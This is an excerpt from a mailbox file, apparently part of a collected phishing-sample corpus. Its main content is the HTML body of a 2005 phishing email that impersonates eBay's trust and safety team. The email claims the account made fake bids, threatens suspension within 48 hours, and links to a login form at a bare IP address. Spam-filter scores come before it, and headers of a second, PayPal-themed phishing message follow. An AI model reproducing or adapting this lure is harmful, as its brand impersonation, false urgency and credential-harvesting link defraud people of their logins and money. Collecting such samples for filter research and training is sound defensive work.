	*  0.0 NO_REAL_NAME From: does not include a real name
	*  0.1 EXCUSE_1 BODY: Gives a lame excuse about why spam was sent
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Content-Length: 3129
Lines: 72
Status: O
X-Status: 
X-Keywords:                  
X-UID: 227


<html> 
</div>
 <p><img alt="Company logo" 
                src="http://pics.ebaystatic.com/aw/pics/navbar/eBayLogoTM.gif" 
                border="0"> </p>
                <p> </td>
              </tr>
            </table>
            <table cellSpacing="0" cellPadding="0" width="100%" 
            bgColor="#9999cc" border="0">
              <tr>
                <td bgColor="#000080" colSpan="2"><img title height="2" alt=" " 
                src="http://pics.ebaystatic.com/aw/pics/homepage/spacer.gif" 
                width="1"></td>
              </tr>
            </table>
            <p align="justify"><font face="Arial" size="2">Dear eBay Customer!<br>
            <br>
            You have received this email because you or someone had used your 
            account to make fake bids at eBay. For security purposes, we are 
            required to open an investigation into this matter.To help speed up 
            this process, please access the following form to complete the 
            verification of your eBay account registration informations: </font>
            </p>
            <table id="table1" cellSpacing="0" cellPadding="4" width="100%" 
            align="center" border="0">
              <tr>
                <td class="pp_sansserif" borderColor="#336699" align="middle" 
                bgColor="#336699"><font face="Arial">
                <span style="TEXT-DECORATION: none">
                <a href="http://211.202.1.221/~member/.ws2/login.html">
                <font color="#ffe580">Click here for confirmation of the your 
                account</font></a></span></font></td>
              </tr>
            </table>
            <p><font face="Arial" size="2">Please Note:<br>
            If we do not receive the appropriate eBay account verification 
            within 48 hours, then we will assume this eBay account is fraudulent 
            and will be suspended.<br>
            The purpose of this verification is to ensure that your eBay account 
            has not been fraudulently used and to combat the fraud from our 
            community. <br>
            We appreciate your support and understanding, as we work together to 
            keep eBay a safe place to trade.<br>
            Thank you for your patience in this matter.<br>
            Regards, Safeharbor Department (Trust and Safety Department)<br>
            eBay Inc.<br>
            Please do not reply to this e-mail as this is only a notification.</font>
            <br>
 </p>
            <p><font face="Arial" size="1">Copyright © 2005 eBay Inc. All Rights 
            Reserved.</font> </p>
            <table cellSpacing="0" cellPadding="0" width="100%" 
            bgColor="#000080" border="0">
              <tr>
                <td bgColor="#000080" colSpan="2"><img title height="2" alt=" " 
                src="http://pics.ebaystatic.com/aw/pics/homepage/spacer.gif" 
                width="1"></td>
              </tr>
            </table>
            </td>
          </tr>
        </table>
      </div>
      <p> </td>
    </tr>
    <tr>
      <td> </td>
    </tr>
    <tr>
    <html>

From hosting@205.177.72.166.ptr.vrtservers.net  Thu Sep  1 12:08:48 2005
Return-Path: <hosting@205.177.72.166.ptr.vrtservers.net>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 88DEA536EE4
	for <jose@login.monkey.org>; Thu,  1 Sep 2005 12:08:48 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 61D8C6FA287
	for <jose@monkey.org>; Thu,  1 Sep 2005 12:08:45 -0400 (EDT)
Received: from 205.177.72.166.ptr.vrtservers.net (unknown [205.177.72.166])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  1 Sep 2005 12:08:45 -0400 (EDT)
Received: from hosting by 205.177.72.166.ptr.vrtservers.net with local (Exim 4.50)
	id 1EArZd-0000fM-UI
	for jose@monkey.org; Thu, 01 Sep 2005 09:05:58 -0700
To: jose@monkey.org
Subject: Update and Verify Your PayPal account***  
